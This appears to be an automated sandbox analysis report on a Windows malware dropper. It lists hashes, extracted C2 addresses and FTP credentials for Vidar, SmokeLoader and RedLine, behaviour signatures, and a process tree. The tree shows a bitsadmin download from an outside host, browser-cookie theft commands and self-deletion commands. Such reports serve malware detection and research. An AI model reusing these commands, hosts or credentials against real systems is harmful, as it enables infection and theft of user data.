Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1801s
  • max time network
    1805s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    06-08-2021 23:43

General

  • Target

    8 (10).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    files.000webhost.com
  • Port:
    21
  • Username:
    hhh6786
  • Password:
    Sutana666

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

installs

C2

178.32.202.118:43127

Extracted

Family

vidar

Version

39.9

Botnet

937

C2

https://prophefliloc.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

Focus1

C2

135.148.139.222:33569

Signatures

  • Detected phishing page
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 4 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE GCleaner Downloader Activity M1

    suricata: ET MALWARE GCleaner Downloader Activity M1

  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

    suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

  • suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

    suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

  • suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

    suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Nirsoft 1 IoCs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 60 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 32 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 50 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 30 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 16 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 15 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 4 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 54 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • NTFS ADS 1 IoCs
  • Script User-Agent 9 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 16 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2724
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2664
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2616
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2432
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2400
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1944
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                • Modifies registry class
                PID:1416
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1340
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1256
                  • C:\Users\Admin\AppData\Local\Temp\8 (10).exe
                    "C:\Users\Admin\AppData\Local\Temp\8 (10).exe"
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2112
                    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:2460
                      • C:\Users\Admin\AppData\Local\Temp\7zSC997FA64\setup_install.exe
                        "C:\Users\Admin\AppData\Local\Temp\7zSC997FA64\setup_install.exe"
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:4008
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c sonia_2.exe
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3176
                          • C:\Users\Admin\AppData\Local\Temp\7zSC997FA64\sonia_2.exe
                            sonia_2.exe
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3960
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c sonia_3.exe
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:740
                          • C:\Users\Admin\AppData\Local\Temp\7zSC997FA64\sonia_3.exe
                            sonia_3.exe
                            5⤵
                            • Executes dropped EXE
                            • Modifies system certificate store
                            PID:1184
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1184 -s 952
                              6⤵
                              • Suspicious use of NtCreateProcessExOtherParentProcess
                              • Program crash
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4648
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c sonia_4.exe
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3400
                          • C:\Users\Admin\AppData\Local\Temp\7zSC997FA64\sonia_4.exe
                            sonia_4.exe
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:408
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c sonia_5.exe
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3372
                          • C:\Users\Admin\AppData\Local\Temp\7zSC997FA64\sonia_5.exe
                            sonia_5.exe
                            5⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            PID:788
                            • C:\Users\Admin\Documents\evsdOto5QjSkyvWmdihH2NyN.exe
                              "C:\Users\Admin\Documents\evsdOto5QjSkyvWmdihH2NyN.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:5000
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                7⤵
                                • Executes dropped EXE
                                PID:4296
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                7⤵
                                • Executes dropped EXE
                                PID:5692
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                7⤵
                                  PID:5844
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  7⤵
                                    PID:6180
                                • C:\Users\Admin\Documents\kKvjLJ7VuNWiUD48PXiLVZLn.exe
                                  "C:\Users\Admin\Documents\kKvjLJ7VuNWiUD48PXiLVZLn.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:5056
                                  • C:\Users\Admin\Documents\kKvjLJ7VuNWiUD48PXiLVZLn.exe
                                    "{path}"
                                    7⤵
                                    • Loads dropped DLL
                                    • Checks processor information in registry
                                    PID:4124
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c taskkill /im kKvjLJ7VuNWiUD48PXiLVZLn.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\kKvjLJ7VuNWiUD48PXiLVZLn.exe" & del C:\ProgramData\*.dll & exit
                                      8⤵
                                        PID:6408
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /im kKvjLJ7VuNWiUD48PXiLVZLn.exe /f
                                          9⤵
                                          • Kills process with taskkill
                                          PID:6664
                                        • C:\Windows\SysWOW64\timeout.exe
                                          timeout /t 6
                                          9⤵
                                          • Delays execution with timeout.exe
                                          PID:4964
                                  • C:\Users\Admin\Documents\kf9glh1tr7mTPCSehlYHvmOF.exe
                                    "C:\Users\Admin\Documents\kf9glh1tr7mTPCSehlYHvmOF.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:5032
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 668
                                      7⤵
                                      • Program crash
                                      PID:5040
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 672
                                      7⤵
                                      • Program crash
                                      PID:4980
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 676
                                      7⤵
                                      • Program crash
                                      PID:384
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 672
                                      7⤵
                                      • Program crash
                                      PID:2268
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 1080
                                      7⤵
                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                      • Program crash
                                      PID:5544
                                  • C:\Users\Admin\Documents\bxVIjeQ9APkj6QhSR_pq0Nx3.exe
                                    "C:\Users\Admin\Documents\bxVIjeQ9APkj6QhSR_pq0Nx3.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Checks SCSI registry key(s)
                                    • Suspicious behavior: MapViewOfSection
                                    PID:5088
                                  • C:\Users\Admin\Documents\dA17HS5TK37PPdme2dfeeFxt.exe
                                    "C:\Users\Admin\Documents\dA17HS5TK37PPdme2dfeeFxt.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Checks processor information in registry
                                    PID:1008
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c taskkill /im dA17HS5TK37PPdme2dfeeFxt.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\dA17HS5TK37PPdme2dfeeFxt.exe" & del C:\ProgramData\*.dll & exit
                                      7⤵
                                        PID:5360
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /im dA17HS5TK37PPdme2dfeeFxt.exe /f
                                          8⤵
                                          • Kills process with taskkill
                                          PID:5208
                                        • C:\Windows\SysWOW64\timeout.exe
                                          timeout /t 6
                                          8⤵
                                          • Delays execution with timeout.exe
                                          PID:6324
                                    • C:\Users\Admin\Documents\V_jquHfXWnAH8S0D3GgiSd6B.exe
                                      "C:\Users\Admin\Documents\V_jquHfXWnAH8S0D3GgiSd6B.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:2704
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 656
                                        7⤵
                                        • Program crash
                                        PID:4668
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 668
                                        7⤵
                                        • Program crash
                                        PID:1724
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 672
                                        7⤵
                                        • Program crash
                                        PID:4224
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 696
                                        7⤵
                                        • Program crash
                                        PID:4456
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1104
                                        7⤵
                                        • Program crash
                                        PID:5412
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1140
                                        7⤵
                                        • Program crash
                                        PID:5768
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1152
                                        7⤵
                                        • Program crash
                                        PID:5156
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "V_jquHfXWnAH8S0D3GgiSd6B.exe" /f & erase "C:\Users\Admin\Documents\V_jquHfXWnAH8S0D3GgiSd6B.exe" & exit
                                        7⤵
                                          PID:6104
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /im "V_jquHfXWnAH8S0D3GgiSd6B.exe" /f
                                            8⤵
                                            • Kills process with taskkill
                                            PID:1652
                                      • C:\Users\Admin\Documents\yTzQJTvt_MPktdtAOnnckYDB.exe
                                        "C:\Users\Admin\Documents\yTzQJTvt_MPktdtAOnnckYDB.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Drops file in Program Files directory
                                        PID:4380
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv3A2D.tmp\tempfile.ps1"
                                          7⤵
                                            PID:4832
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv3A2D.tmp\tempfile.ps1"
                                            7⤵
                                              PID:4256
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv3A2D.tmp\tempfile.ps1"
                                              7⤵
                                                PID:6912
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv3A2D.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:6272
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv3A2D.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:6228
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv3A2D.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:6132
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv3A2D.tmp\tempfile.ps1"
                                                      7⤵
                                                      • Checks for any installed AV software in registry
                                                      PID:6536
                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                      "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                      7⤵
                                                      • Download via BitsAdmin
                                                      PID:5936
                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pQLV9quaGdLErsKh -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                      7⤵
                                                      • Drops file in Program Files directory
                                                      PID:6456
                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfsY50a76TFlsHmZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                      7⤵
                                                        PID:3852
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv3A2D.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:748
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv3A2D.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:6400
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv3A2D.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:6156
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv3A2D.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:4464
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv3A2D.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:7080
                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\hdvAaRs\hdvAaRs.dll" hdvAaRs
                                                                  7⤵
                                                                    PID:6668
                                                                    • C:\Windows\system32\rundll32.exe
                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\hdvAaRs\hdvAaRs.dll" hdvAaRs
                                                                      8⤵
                                                                      • Drops file in System32 directory
                                                                      PID:5096
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv3A2D.tmp\tempfile.ps1"
                                                                    7⤵
                                                                    • Drops file in Program Files directory
                                                                    PID:4268
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv3A2D.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:4952
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv3A2D.tmp\tempfile.ps1"
                                                                      7⤵
                                                                      • Blocklisted process makes network request
                                                                      PID:6192
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv3A2D.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:5612
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv3A2D.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:6476
                                                                        • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                          "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                          7⤵
                                                                          • Drops file in Program Files directory
                                                                          PID:5712
                                                                      • C:\Users\Admin\Documents\z6xzzLDdQbhy4aCr04S_W_oR.exe
                                                                        "C:\Users\Admin\Documents\z6xzzLDdQbhy4aCr04S_W_oR.exe"
                                                                        6⤵
                                                                          PID:4360
                                                                        • C:\Users\Admin\Documents\IclqqvIDXwbJeNH0MwiZe2A8.exe
                                                                          "C:\Users\Admin\Documents\IclqqvIDXwbJeNH0MwiZe2A8.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          PID:4268
                                                                          • C:\Users\Admin\Documents\IclqqvIDXwbJeNH0MwiZe2A8.exe
                                                                            "C:\Users\Admin\Documents\IclqqvIDXwbJeNH0MwiZe2A8.exe"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Modifies data under HKEY_USERS
                                                                            • Modifies system certificate store
                                                                            PID:4404
                                                                        • C:\Users\Admin\Documents\cgSwYajWEnX1vQhe0KZrpUMl.exe
                                                                          "C:\Users\Admin\Documents\cgSwYajWEnX1vQhe0KZrpUMl.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          PID:4264
                                                                        • C:\Users\Admin\Documents\6OTDRSqyQy8TeLD6XOkjtAZj.exe
                                                                          "C:\Users\Admin\Documents\6OTDRSqyQy8TeLD6XOkjtAZj.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          PID:4220
                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:4808
                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:2100
                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:5628
                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:5456
                                                                          • C:\Windows\system32\WerFault.exe
                                                                            C:\Windows\system32\WerFault.exe -u -p 4220 -s 1608
                                                                            7⤵
                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                            • Program crash
                                                                            PID:2268
                                                                        • C:\Users\Admin\Documents\cwRX16A8X_dFRtcIbzNdgaNG.exe
                                                                          "C:\Users\Admin\Documents\cwRX16A8X_dFRtcIbzNdgaNG.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4172
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                            7⤵
                                                                              PID:5556
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /f /im chrome.exe
                                                                                8⤵
                                                                                • Kills process with taskkill
                                                                                PID:5844
                                                                          • C:\Users\Admin\Documents\_ruphJYsuM071lji2M541VR6.exe
                                                                            "C:\Users\Admin\Documents\_ruphJYsuM071lji2M541VR6.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Drops file in Program Files directory
                                                                            PID:4144
                                                                            • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                              "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:2344
                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                PID:748
                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                PID:6108
                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                8⤵
                                                                                  PID:5128
                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  8⤵
                                                                                    PID:5980
                                                                                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                  "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
